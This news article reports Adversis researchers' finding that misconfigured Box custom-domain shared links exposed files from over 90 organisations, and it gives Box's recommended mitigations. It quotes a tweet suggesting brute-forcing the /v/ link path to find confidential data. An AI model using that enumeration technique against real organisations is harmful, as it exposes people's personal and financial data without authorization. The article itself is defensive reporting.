Security researchers have uncovered a potential data leak of confidential corporate files due to a poor configuration of cloud storage service Box.
Cybersecurity firm Adversis announced that its team has found an issue with Box accounts that leaves many subscribers, including Apple and other tech companies, open to data breach.
Box is a cloud-based content management and file sharing service designed to cater to businesses. It provides users with data protection through AES 256-bit encryption.
However, when Adversis researchers examined the service, they found that they can access hundreds of thousands of documents and other data because of a flaw in Box’s security structure.
The problem lies in how Box allows its subscribers to share files using links on custom domains. If a particular link is discovered, users with enough know-how on the web can look for other secret links on subdomains. These can then give them access to other files on the cloud storage service.
In their review, Adversis researchers saw that over 90 organizations have their data files and folders publicly accessible. Apple, Amadeus, Discovery, Edelman, Herbalife, and Pointcare are just some of the companies found to have their data exposed in the cloud service.
The team found massive amounts of sensitive information such as passport photos, social security and bank account numbers, employees lists, customer lists, financial data, IT data, and even files on a high profile technology prototype.
Adversis pointed out that the issue is not a bug or vulnerability in Box’s system, and it has also been brought up in the past. A Twitter user by the name of Nenad Zaric posted about it in 2017, though the cybersecurity company said the warning did not seem to get enough attention.
“If your company is using #Box with custom domain, try brute-forcing /v/path (http://company.app.box.com/v/ ). There could be a lot of confidential data exposed. #BugBounty #Security,” Zaric wrote.
Adversis said Box has provided several steps on how to secure subscriber accounts from URL guessing by hackers.
Administrators are advised to configure the default access of their Shared Link to “People in your company” to keep users from accidentally creating public or open links. They should also regularly run a shared link report to look for and manage public custom shared links.
The company also recommends that users should avoid creating public custom shared links to private content to prevent potential data breaches.
Data breaches involving cloud services remain a particularly concern for companies, given the ever increasing dependence on web-based file storage. More than 99 billion records were left exposed because of data breaches in 2017 alone, according to Imperva Incapsula.
While companies employ different strategies to secure sensitive data from attacks, vulnerabilities still occur even to the biggest companies in the world.
In 2018, Verizon was exposed to a potential data breach because of a misconfigured cloud-based file repository. The blunder left the names, addresses, account details, and account personal identification numbers (PINs) of millions of U.S. customers open to illegal access.
In 2017, researchers found at least four cloud storage vulnerabilities in Accenture’s system. Important files such as secret API data, authentication credentials, certificates, decryption keys, and customer information were left unsecured and publicly downloadable.
The issue was linked to Accenture Cloud Platform, a multi-cloud management platform used primarily by the company’s customers.